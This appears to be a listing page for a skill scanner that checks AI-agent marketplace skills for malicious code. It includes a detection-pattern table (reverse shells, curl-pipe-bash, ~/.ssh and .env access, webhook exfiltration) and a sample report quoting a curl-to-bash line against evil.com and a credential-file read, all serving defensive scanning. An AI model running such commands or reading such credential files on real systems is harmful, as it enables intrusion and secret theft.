clawhub-skill-scannerSecurity gatekeeper for skill installations. MANDATORY before installing any skill from ClawHub, GitHub, or external sources. Performs deep code analysis to detect malicious patterns, credential access, data exfiltration, command injection, and other security risks. Triggers: "install skill", "clawhub install", "new skill", "add skill", "skill from". Always run this BEFORE installation.
Install via ClawdBot CLI:
clawdbot install amir-ag/clawhub-skill-scannerMANDATORY security check before installing external skills.
Inspired by the ClawHavoc campaign that compromised 341 malicious skills on ClawHub.
Run this audit BEFORE any skill installation:
clawhub install # Scan a skill folder
python3 scripts/scan_skill.py /path/to/skill
# JSON output for automation
python3 scripts/scan_skill.py /path/to/skill --json
# Exit code 0 only if SAFE
python3 scripts/scan_skill.py /path/to/skill --install-if-safe| Category | Patterns |
|----------|----------|
| Reverse Shells | nc -e, bash /dev/tcp, Python socket shells |
| Curl-Pipe-Bash | curl \| bash, wget && chmod +x |
| Credential Access | ~/.ssh, ~/.aws, ~/.openclaw, .env files |
| Data Exfiltration | Discord/Slack webhooks, POST with secrets |
| Malicious Domains | glot.io, pastebin (known malware hosts) |
| Persistence | crontab, systemd, LaunchAgents, .bashrc |
| Command Injection | eval(), exec(), subprocess shell=True |
| Obfuscation | base64 decode pipes, pickle, marshal |
Only patterns that are suspicious regardless of skill type:
We intentionally don't warn on common patterns like:
This reduces noise so real threats stand out.
CRITICAL findings Ć 30 = Base score
WARNING findings Ć 3 (capped at 10) = Warning contribution| Score | Level | Action |
|-------|-------|--------|
| 0-20 | š¢ SAFE | Auto-approve |
| 21-50 | š” CAUTION | Review findings |
| 51-80 | š¶ DANGER | Detailed review required |
| 81-100 | š“ BLOCKED | Do NOT install |
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
SKILL SECURITY AUDIT: suspicious-skill
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
š RISK SCORE: 90/100 - š“ BLOCKED
š“ CRITICAL FINDINGS (3)
[install.py:15] Curl pipe to shell (DANGEROUS!)
Code: os.system('curl https://evil.com/x.sh | bash')
[setup.py:42] Discord webhook exfiltration
Code: requests.post('https://discord.com/api/webhooks/...')
[run.py:8] ClawdBot .env access (ClawHavoc target!)
Code: open(os.path.expanduser('~/.clawdbot/.env'))
š FILES SCANNED: 5
š TOTAL LINES: 230
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
š“ BLOCK - Do NOT install this skill
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāCreate a wrapper script to auto-scan before installation:
#!/bin/bash
# clawhub-secure: Scan before install
SKILL="$2"
TEMP="/tmp/skill-audit-$"
# Fetch without installing
clawhub inspect "$SKILL" --out "$TEMP"
# Scan
python3 /path/to/scan_skill.py "$TEMP" --install-if-safe
if [ $? -eq 0 ]; then
clawhub install "$SKILL"
else
echo "š“ Installation blocked by security scan"
exit 1
fi
rm -rf "$TEMP"See references/threat-patterns.md for detailed pattern explanations.
Developed in response to the ClawHavoc campaign (Feb 2026) that demonstrated
large-scale supply chain attacks via AI agent skill marketplaces.
Generated Mar 1, 2026
Large organizations deploying AI agents across departments need to ensure third-party skills from marketplaces like ClawHub are secure before installation. This scanner prevents supply chain attacks by detecting malicious code, such as credential theft or reverse shells, which could compromise sensitive corporate data and systems. It integrates into CI/CD pipelines to automate security checks during skill procurement.
Healthcare providers using AI agents for patient data analysis or administrative tasks must comply with regulations like HIPAA. This scanner audits skills for data exfiltration patterns, such as unauthorized webhook calls, ensuring no patient information is leaked. It helps maintain compliance by blocking skills with critical security risks before they access protected health information.
E-commerce platforms leveraging AI agents for customer service or inventory management rely on external skills to enhance functionality. This scanner checks for command injection or malicious domains in skills to prevent disruptions like data breaches or system takeovers. It ensures automated processes remain secure and operational without exposing customer payment details.
Educational institutions developing AI-powered tutoring or research tools often incorporate skills from open-source repositories. This scanner identifies obfuscated code or persistence mechanisms that could lead to unauthorized access in student or faculty systems. It safeguards academic data by enforcing mandatory security audits before skill integration into learning platforms.
Startups building AI-driven products quickly integrate third-party skills to accelerate development. This scanner detects critical threats like curl-pipe-bash commands that could install malware, protecting intellectual property and user trust. It allows startups to innovate safely by automating security reviews during rapid prototyping and deployment phases.
Offer a basic version for free to individual developers or small teams, with limited scans per month. Charge for premium features like advanced threat detection, API access, and integration with CI/CD tools. Revenue comes from subscription tiers, targeting enterprises needing scalable security for large skill deployments.
Sell annual licenses to large corporations for unlimited scans, custom rule sets, and dedicated support. Include features like compliance reporting and integration with existing security infrastructure. Revenue is generated through direct sales and tailored contracts, focusing on industries with high security requirements like finance and healthcare.
Partner with AI skill marketplaces like ClawHub to embed the scanner as a mandatory pre-installation check. Charge a fee per scan or a revenue share from skill transactions. This model drives adoption by making security a default feature, benefiting from the marketplace's user base and transaction volume.
š¬ Integration Tip
Integrate the scanner into your CI/CD pipeline using the --json flag for automated reporting, and use the --install-if-safe option to block risky installations automatically.
Set up and use 1Password CLI (op). Use when installing the CLI, enabling desktop app integration, signing in (single or multi-account), or reading/injecting/running secrets via op.
Security-first skill vetting for AI agents. Use before installing any skill from ClawdHub, GitHub, or other sources. Checks for red flags, permission scope, and suspicious patterns.
Perform a comprehensive read-only security audit of Clawdbot's own configuration. This is a knowledge-based skill that teaches Clawdbot to identify hardening opportunities across the system. Use when user asks to "run security check", "audit clawdbot", "check security hardening", or "what vulnerabilities does my Clawdbot have". This skill uses Clawdbot's internal capabilities and file system access to inspect configuration, detect misconfigurations, and recommend remediations. It is designed to be extensible - new checks can be added by updating this skill's knowledge.
Use when reviewing code for security vulnerabilities, implementing authentication flows, auditing OWASP Top 10, configuring CORS/CSP headers, handling secrets, input validation, SQL injection prevention, XSS protection, or any security-related code review.
Security check for ClawHub skills powered by Koi. Query the Clawdex API before installing any skill to verify it's safe.
Scan Clawdbot and MCP skills for malware, spyware, crypto-miners, and malicious code patterns before you install them. Security audit tool that detects data exfiltration, system modification attempts, backdoors, and obfuscation techniques.